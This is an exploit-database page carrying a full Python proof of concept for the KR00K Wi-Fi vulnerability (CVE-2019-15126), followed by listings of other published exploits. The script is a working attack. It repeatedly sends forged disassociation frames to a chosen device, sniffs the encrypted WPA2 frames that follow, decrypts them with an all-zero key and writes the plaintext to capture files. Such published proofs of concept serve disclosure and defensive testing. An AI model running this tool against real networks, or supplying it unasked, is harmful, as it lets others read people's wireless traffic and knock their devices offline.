Menu

Search for hundreds of thousands of exploits

"Broadcom Wi-Fi Devices - 'KR00K Information Disclosure"

Author

Exploit author

"Maurizio S"

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-03-18

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
# Kr00ker
#
# Experimetal KR00K PoC in python3 using scapy
#
# Description:
# This script is a simple experiment to exploit the KR00K vulnerability (CVE-2019-15126), 
# that allows to decrypt some WPA2 CCMP data in vulnerable devices.
# More specifically this script attempts to retrieve Plaintext Data of WPA2 CCMP packets knowning:
# * the TK (128 bites all zero) 
# * the Nonce (sent plaintext in packet header)
# * the Encrypted Data
#
# Where:
# * WPA2 AES-CCMP decryption --> AES(Nonce,TK) XOR Encrypted Data = Decrypted Data  
# * Decrypted stream starts with "\xaa\xaa\x03\x00\x00\x00"
# * Nonce (104 bits) = Priority (1byte) + SRC MAC (6bytes) + PN (6bytes)
#
# This PoC works on WPA2 AES CCMP with Frequency 2.4GHz WLANs.
#
# References:
# https://www.welivesecurity.com/wp-content/uploads/2020/02/ESET_Kr00k.pdf
#
#
# Copyright (C) 2020   Maurizio Siddu
#
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>





import argparse, threading 
import datetime, sys, re
from scapy.all import *
from scapy.layers.dot11 import RadioTap, Dot11, Dot11Deauth
from Cryptodome.Cipher import AES



# Proof of Sympathy ;-)
LOGO = """\
 __ _  ____   __    __  __ _  ____  ____ 
(  / )(  _ \ /  \  /  \(  / )(  __)(  _ \\
 )  (  )   /(  0 )(  0 ))  (  ) _)  )   /
(__\_)(__\_) \__/  \__/(__\_)(____)(__\_)
"""


KR00K_PATTERN = b'\xaa\xaa\x03\x00\x00\x00'


class Krooker:
    # Define Krooker class
    def __init__(self, interface, target_mac, other_mac, reason, num, delay):
        self.interface = interface
        self.target_mac = target_mac
        self.other_mac = other_mac
        self.reason = reason
        self.num = num
        self.delay = delay


    def wpa2_decrypt(self, enc_pkt):
        # Try to decrypt the data contained in the sniffed packet
        t_key = bytes.fromhex("00000000000000000000000000000000")
        # This check is redundant
        if not enc_pkt.haslayer(Dot11CCMP):
            return None
        dot11 = enc_pkt[Dot11]
        dot11ccmp = enc_pkt[Dot11CCMP]
        
        # Extract the Packet Number (IV)
        PN = "{:02x}{:02x}{:02x}{:02x}{:02x}{:02x}".format(dot11ccmp.PN5,dot11ccmp.PN4,dot11ccmp.PN3,dot11ccmp.PN2,dot11ccmp.PN1,dot11ccmp.PN0)
        # Extract the victim MAC address
        source_addr = re.sub(':','',dot11.addr2)
        # Extract the QoS tid
        if enc_pkt.haslayer(Dot11QoS):
            tid = "{:01x}".format(enc_pkt[Dot11QoS].TID)
        else:
            tid = '0'
        priority = tid + '0'
        # Build the nonce
        ccmp_nonce = bytes.fromhex(priority) + bytes.fromhex(source_addr) + bytes.fromhex(PN)

        # Finally try to decrypt wpa2 data 
        enc_cipher = AES.new(t_key, AES.MODE_CCM, ccmp_nonce, mac_len=8)
        decrypted_data = enc_cipher.decrypt(dot11ccmp.data[:-8])
        return decrypted_data



    def disassociate(self):
        # Forge the dot11 disassociation packet
        dis_packet = RadioTap()/Dot11(type=0, subtype=12, addr1=self.target_mac, addr2=self.other_mac, addr3=self.other_mac)/Dot11Deauth(reason=self.reason)
        # Loop to send the disassociation packets to the victim device
        while True:
            # Repeat every delay value seconds
            time.sleep(self.delay)
            print("["+str(datetime.now().time())+"][+] Disassociation frames (reason "+str(self.reason)+") sent to target "+self.target_mac+" as sender endpoint "+self.other_mac)
            sendp(dis_packet, iface=self.interface, count=self.num, verbose=False)



    def check_packet(self, sniffed_pkt):
        # Filter for WPA2 AES CCMP packets containing data to decrypt
        if sniffed_pkt[Dot11].type == 2 and sniffed_pkt.haslayer(Dot11CCMP):
            #print("["+str(datetime.now().time())+"][DEBUG] packet tipe:"+str(sniffed_pkt[Dot11].type)+" sub:"+str(sniffed_pkt[Dot11].subtype))
            # Decrypt the packets using the all zero temporary key
            dec_data = self.wpa2_decrypt(sniffed_pkt)
            # Check if the target is vulnerable
            if dec_data and dec_data[0:len(KR00K_PATTERN)] == KR00K_PATTERN:
                print("["+str(datetime.now().time())+"][+] Target "+self.target_mac+" is vulnerable to Kr00k, decrypted "+str(len(dec_data))+" bytes")
                hexdump(dec_data)
                # Save the encrypted and decrypted packets
                print("["+str(datetime.now().time())+"][+] Saving encrypted and decrypted 'pcap' files in current folder")
                dec_pkt = bytes.fromhex(re.sub(':','',self.target_mac) + re.sub(':','',self.other_mac)) + dec_data[6:]
                wrpcap("enc_pkts.pcap", sniffed_pkt, append=True)
                wrpcap("dec_pkts.pcap", dec_pkt, append=True)
                # Uncomment this if you need a one-shoot PoC decryption 
                #sys.exit(0)
            #else:
                #print("["+str(datetime.now().time())+"][DEBUG] This data decryption with all zero TK went wrong")
                #pass



    def run_disassociation(self):
        # Run disassociate function in a background thread
        try:
            self.disassociate()
        except KeyboardInterrupt:
            print("\n["+str(datetime.now().time())+"][!] Exiting, caught keyboard interrupt")
            return





def main():
    # Passing arguments
    parser = argparse.ArgumentParser(prog="kr00ker.py", usage="%(prog)s -i <interface-name> -s <SSID> -c <MAC-client> -n <num-packets> -r <reason-id> -t <target-id> -w <wifi-channel> -d <delay>")
    parser.add_argument("-i", "--interface", required=True, help="The Interface name that you want to send packets out of, it must be set in monitor mode", type=str)
    parser.add_argument("-b", "--bssid", required=True, help="The MAC address of the Access Point to test", type=str)
    parser.add_argument("-c", "--client", required=True, help="The MAC address of the Client Device to test", type=str)
    parser.add_argument("-n", "--number", required=False, help="The Number of disassociation packets you want to send", type=int, default=1)
    parser.add_argument("-r", "--reason", required=False, help="The Reason identifier of disassociation packets you want to send, accepted values from 1 to 99", type=int, default=0)
    parser.add_argument("-t", "--target", required=False, help="The Target identifier", choices=["ap", "client"], type=str, default="ap")
    parser.add_argument("-w", "--wifi_channel", required=False, help="The WiFi channel identifier", type=int, default="1")
    parser.add_argument("-d", "--delay", required=False, help="The delay for disassociation frames", type=int, default="4")
    args = parser.parse_args()
    
    # Print the kr00ker logo
    print(LOGO)

    # Start the fun!!
    try:
        interface = args.interface
        ap_mac = args.bssid.lower()
        client_mac = args.client.lower()
        reason = args.reason
        target_channel = args.wifi_channel
        n_pkts = args.number
        delay = args.delay

        # Set the selected channel
        if target_channel in range(1, 14):
            os.system("iwconfig " + interface + " channel " + str(target_channel))
        else:
            print("["+str(datetime.now().time())+"][-] Exiting, the specified channel "+target_channel+" is not valid")
            exit(1)
    
        # Check if valid device MAC Addresses have been specified
        if client_mac == "ff:ff:ff:ff:ff:ff" or ap_mac == "ff:ff:ff:ff:ff:ff":
            print("["+str(datetime.now().time())+"][-] Exiting, the specified FF:FF:FF:FF:FF:FF broadcast MAC address is not valid")
            exit(1)
    
        # Check if a valid reason have been specified
        if reason not in range(1,99):
            print("Exiting, specified a not valid disassociation Reason ID: "+str(reason))
            exit(1)

        # Set the MAC address of the target
        if args.target == "client":
            target_mac = client_mac
            other_mac = ap_mac
            print("["+str(datetime.now().time())+"][+] The Client device "+target_mac+" will be the target")
        else:
            target_mac = ap_mac
            other_mac = client_mac
            print("["+str(datetime.now().time())+"][+] The AP "+target_mac+" will be the target")

        # Krooker instance initialization
        krooker = Krooker(interface, target_mac, other_mac, reason, n_pkts, delay)

        # Start a background thread to send disassociation packets
        k_th = threading.Thread(target=krooker.run_disassociation)
        k_th.daemon = True    # This does not seem to be useful
        k_th.start()

        # Start packet interception
        s_filter = "ether src "+str(target_mac)+" and ether dst "+str(other_mac)+" and type Data"
        sniff(iface=krooker.interface, filter=s_filter, prn=krooker.check_packet)    

    except KeyboardInterrupt:
        print("\n["+str(datetime.now().time())+"][!] Exiting, caught keyboard interrupt")
        k_th.join()
        sys.exit(0)
    
    except scapy.error.Scapy_Exception:
        print("["+str(datetime.now().time())+"][!] Exiting, your wireless interface seems not in monitor mode")
        sys.exit(1)
        


if __name__ == "__main__":
    main()
Release DateTitleTypePlatformAuthor
2020-04-03"AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH)"localwindowsHodorsec
2020-04-03"Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution"webappsphp"Basim Alabdullah"
2020-04-02"DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)"localwindows"Paras Bhatia"
2020-04-01"DiskBoss 7.7.14 - Denial of Service (PoC)"doswindows"Paras Bhatia"
2020-04-01"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)"localwindowsHodorsec
2020-03-31"Redis - Replication Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-31"SharePoint Workflows - XOML Injection (Metasploit)"remotewindowsMetasploit
2020-03-31"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection"webappshardware"Jacob Baines"
2020-03-31"IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)"remotemultipleMetasploit
2020-03-31"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection"webappshardware"Jacob Baines"
2020-03-31"FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)"doswindows"Paras Bhatia"
2020-03-31"DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)"remotehardwareMetasploit
2020-03-30"Zen Load Balancer 3.10.1 - Remote Code Execution"webappscgi"Cody Sixteen"
2020-03-30"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation"localwindows"Daniel García Gutiérrez"
2020-03-30"Multiple DrayTek Products - Pre-authentication Remote Root Code Execution"remotelinux0xsha
2020-03-30"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)"localwindowsHodorsec
2020-03-30"Joomla! com_fabrik 3.9.11 - Directory Traversal"webappsphpqw3rTyTy
2020-03-30"Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-27"Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal"webappsjavahongphukt
2020-03-27"rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution"webappsphpvikingfr
2020-03-27"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-27"ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)"webappsphp"Mustafa Emre Gül"
2020-03-27"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-26"TP-Link Archer C50 3 - Denial of Service (PoC)"webappshardwarethewhiteh4t
2020-03-26"Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution"webappsphp"Engin Demirbilek"
2020-03-25"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-25"Joomla! Component GMapFP 3.30 - Arbitrary File Upload"webappsphpThelastVvV
2020-03-25"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path"localwindows"Felipe Winsnes"
2020-03-25"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting"webappsphpSunCSR
2020-03-25"AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path"localwindows"Roberto Piña"
Release DateTitleTypePlatformAuthor
2020-03-31"IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)"remotemultipleMetasploit
2020-03-23"FIBARO System Home Center 5.021 - Remote File Include"webappsmultipleLiquidWorm
2020-03-23"CyberArk PSMP 10.9.1 - Policy Restriction Bypass"remotemultiple"LAHBAL Said"
2020-03-18"Broadcom Wi-Fi Devices - 'KR00K Information Disclosure"remotemultiple"Maurizio S"
2020-03-17"Microsoft VSCode Python Extension - Code Execution"localmultipleDoyensec
2020-03-17"ManageEngine Desktop Central - Java Deserialization (Metasploit)"remotemultipleMetasploit
2020-03-09"Google Chrome 72 and 73 - Array.map Out-of-Bounds Write (Metasploit)"remotemultipleMetasploit
2020-03-09"Google Chrome 67_ 68 and 69 - Object.create Type Confusion (Metasploit)"remotemultipleMetasploit
2020-03-09"Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)"remotemultipleMetasploit
2020-03-09"Counter Strike: GO - '.bsp' Memory Control (PoC)"localmultiple"0day enthusiast"
2020-03-05"EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)"remotemultipleMetasploit
2020-03-02"Joplin Desktop 1.0.184 - Cross-Site Scripting"webappsmultiple"Javier Olmedo"
2020-03-02"Wing FTP Server 6.2.5 - Privilege Escalation"webappsmultiple"Cary Hooper"
2020-02-28"qdPM < 9.1 - Remote Code Execution"webappsmultiple"Tobin Shields"
2020-02-24"Real Web Pentesting Tutorial Step by Step - [Persian]"webappsmultiple"Meisam Monsef"
2020-02-20"Apache Tomcat - AJP 'Ghostcat File Read/Inclusion"webappsmultipleYDHCUI
2020-02-10"Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting"webappsmultiple"Prasenjit Kanti Paul"
2020-02-10"iOS/macOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand()"dosmultiple"Google Security Research"
2020-02-07"Google Invisible RECAPTCHA 3 - Spoof Bypass"webappsmultipleMatamorphosis
2020-02-03"Cacti 1.2.8 - Unauthenticated Remote Code Execution"webappsmultipleAskar
2020-02-03"Cacti 1.2.8 - Authenticated Remote Code Execution"webappsmultipleAskar
2020-01-28"macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image"dosmultiple"Google Security Research"
2020-01-22"KeePass 2.44 - Denial of Service (PoC)"dosmultiple"Mustafa Emre Gül"
2020-01-16"Tautulli 2.1.9 - Denial of Service ( Metasploit )"webappsmultiple"Ismail Tasdelen"
2020-01-16"SunOS 5.10 Generic_147148-26 - Local Privilege Escalation"localmultiple"Marco Ivaldi"
2020-01-16"Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal"webappsmultiple"Dhiraj Mishra"
2020-01-13"Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)"webappsmultiplemekhalleh
2020-01-11"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)"webappsmultiple"Project Zero India"
2020-01-11"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution"webappsmultipleTrustedSec
2020-01-01"nostromo 1.9.6 - Remote Code Execution"remotemultipleKr0ff
Release DateTitleTypePlatformAuthor
2020-03-18"Broadcom Wi-Fi Devices - 'KR00K Information Disclosure"remotemultiple"Maurizio S"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48233/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse